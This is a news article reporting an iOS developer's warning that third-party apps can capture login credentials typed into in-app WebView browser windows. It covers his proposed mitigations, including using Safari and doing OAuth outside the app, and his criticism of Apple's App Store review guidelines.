iOS In-App Browsing Poses Security Risk

iOS developer warns that browser windows invoked within third-party apps allow information theft.
6 Things Not To Do With iPhone 6
6 Things Not To Do With iPhone 6
(Click image for larger view and slideshow.)

iOS apps that present Web pages can be abused by malicious developers to steal login details, developer Craig Hockenberry said on Wednesday.

In a blog post, Hockenberry, a principal at app maker Iconfactory, explains that in-app browser windows -- what iOS developers call a WebView -- are vulnerable to manipulation through iOS code.

As a proof of concept, Hockenberry has posted a sample project that demonstrates how supposedly secure login credentials entered into a WebView browser input form can be copied as clear text by the iOS code presenting the WebView element.  

"The app is stealing your username and password by watching what you type on the site," Hockenberry said. "There’s nothing the site owner can do about this, since the WebView has control over JavaScript that runs in the browser."

The keylogging vulnerability appears to be made possible by the deprecated KeyboardEvent API, still widely used to handle keyboard input on many Web pages. Hockenberry insists Web technologies of this sort are not inherently bad. Rather, he says, the iOS app has as much access to the Web page's JavaScript code as the developer of the Web page.

Hockenberry advises that while in-app browsing can be useful for viewing Web content, iOS users should open Web links in mobile Safari because Apple's browser can't be accessed by third-party code in the same way as an in-app WebView.

Apple isn't likely to catch apps designed to exploit this technique, Hockenberry said, citing the huge number of apps that get reviewed every day and the ease with which malicious code can be concealed, through obfuscation or through a setting that disables the malicious mechanism until after the app has been reviewed and released.

One way to mitigate the risk of credential theft involves the use of OAuth authentication, the API that allows credentials from Internet services like Facebook, Google, or Yahoo to be used to login to third-party websites.

But Hockenberry points out that proper implementation of OAuth calls for taking mobile app users outside the app to Safari to handle the authentication. This runs contrary to Apple's App Store Review Guidelines, specifically section 10.6, which states, "If your user interface is complex or less than very good, [your app] may be rejected." While handling user authentication in an app may offer a better user experience, best practices for OAuth implementation call for keeping apps and browser operations separate.

Hockenberry argues, "... this is a case where user security trumps usability. Apple should change [its] policy for apps that use OAuth."

Considering how prevalent third-party attacks are, we need to ask hard questions about how partners and suppliers are safeguarding systems and data. In the Partners' Role In Perimeter Security report, we'll discuss concrete strategies such as setting standards that third-party providers must meet to keep your business, conducting in-depth risk assessments -- and ensuring that your network has controls in place to protect data in case these defenses fail. (Free registration required.)

Editor's Choice
Brandon Taylor, Digital Editorial Program Manager
Jessica Davis, Senior Editor
Cynthia Harvey, Freelance Journalist, InformationWeek
Terry White, Associate Chief Analyst, Omdia
John Abel, Technical Director, Google Cloud
Richard Pallardy, Freelance Writer
Cynthia Harvey, Freelance Journalist, InformationWeek
Pam Baker, Contributing Writer